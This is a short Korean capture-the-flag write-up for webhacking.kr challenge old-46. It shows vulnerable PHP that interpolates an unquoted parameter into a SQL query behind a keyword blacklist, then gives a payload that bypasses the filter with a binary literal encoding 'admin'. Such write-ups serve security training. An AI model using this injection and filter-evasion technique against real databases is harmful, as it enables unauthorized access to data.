old-46 (300)

첫 화면이다.

view-source를 클릭해 본 소스는 아래와 같다.

<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 46</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get>
level : <input name=lv value=1><input type=submit>
</form>
<hr><a href=./?view_source=1>view-source</a><hr>
<?php
  if($_GET['lv']){
    $db = dbconnect();
    $_GET['lv'] = addslashes($_GET['lv']);
    $_GET['lv'] = str_replace(" ","",$_GET['lv']);
    $_GET['lv'] = str_replace("/","",$_GET['lv']);
    $_GET['lv'] = str_replace("*","",$_GET['lv']);
    $_GET['lv'] = str_replace("%","",$_GET['lv']);
    if(preg_match("/select|0x|limit|cash/i",$_GET['lv'])) exit();
    $result = mysqli_fetch_array(mysqli_query($db,"select id,cash from chall46 where lv=$_GET[lv]"));
    if($result){
      echo("{$result['id']} information<br><br>money : {$result['cash']}");
      if($result['id'] == "admin") solve(46);
    }
  }
?>
</body>
</html>

https://webhacking.kr/challenge/web-23/?lv=0||id=0b0110000101100100011011010110100101101110 에 접속하면 문제가 풀린다.

lv에 0||id=0b0110000101100100011011010110100101101110 를 넣은 셈이다.

0110000101100100011011010110100101101110 는 admin 의 binary 값이다.

Previousold-45 (550)Nextold-47 (150)

Last updated 4 years ago